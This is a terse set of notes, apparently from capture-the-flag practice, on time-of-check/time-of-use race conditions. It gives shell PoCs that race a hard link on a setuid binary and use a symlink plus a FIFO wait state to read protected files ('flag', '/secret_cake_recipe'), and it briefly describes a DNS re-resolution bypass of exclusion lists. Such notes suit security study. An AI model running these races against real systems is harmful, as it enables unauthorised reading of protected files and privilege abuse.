TOCTOU

Time of Check Time of Use¶

Linux ReadLink¶

ReadLink TOCTOU PoC:

cd /home/user
cp /bin/cat 'asdf (deleted)'

#Start Loop
while true; do ln /home/poetry/poerty ./asdf; (./asdf ../poetry/flag &); rm asdf; done

DNS¶

Looking up the IP of a DNS address to test if it in a exclusion list. Then making a request to the domain. Since this makes a second DNS request this could resolve to a IP that is on the exclusion list.

Linux¶

Using a Pipe to create a wait state in a executable

PoC:

cd /tmp
mkdir dev

ln -s /secret_cake_recipe /tmp/dev/console

mkfifo /tmp/xyz

/home/user/holey_beep $(seq 1 1 5000) 2> /tmp/xyz &
(sleep 30; cat - ) < /tmp/xyz &
pgrep holey_beep | head -c 100

kill -15 12